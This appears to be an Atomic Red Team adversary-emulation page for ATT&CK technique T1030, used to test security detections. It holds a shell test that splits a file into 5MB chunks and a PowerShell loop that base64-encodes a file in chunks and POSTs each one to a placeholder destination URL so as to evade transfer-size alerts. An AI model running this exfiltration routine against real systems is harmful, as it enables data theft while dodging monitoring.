T1030 - Data Transfer Size Limits

Description from ATT&CK (opens in a new tab)

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

Atomic Tests

• Atomic Test #1 - Data Transfer Size Limits

• Atomic Test #2 - Network-Based Data Transfer in Small Chunks

Atomic Test #1 - Data Transfer Size Limits

Take a file/directory, split it into 5Mb chunks

Supported Platforms: macOS, Linux

auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a

Inputs:

Attack Commands: Run with sh!

cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}

Cleanup Commands:

if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;

Dependencies: Run with sh!

Description: The file must exist for the test to run.

Check Prereq Commands:

if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;

Get Prereq Commands:

if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1

Atomic Test #2 - Network-Based Data Transfer in Small Chunks

Simulate transferring data over a network in small chunks to evade detection.

Supported Platforms: Windows

auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f

Inputs:

Attack Commands: Run with powershell!

$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize
 
while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()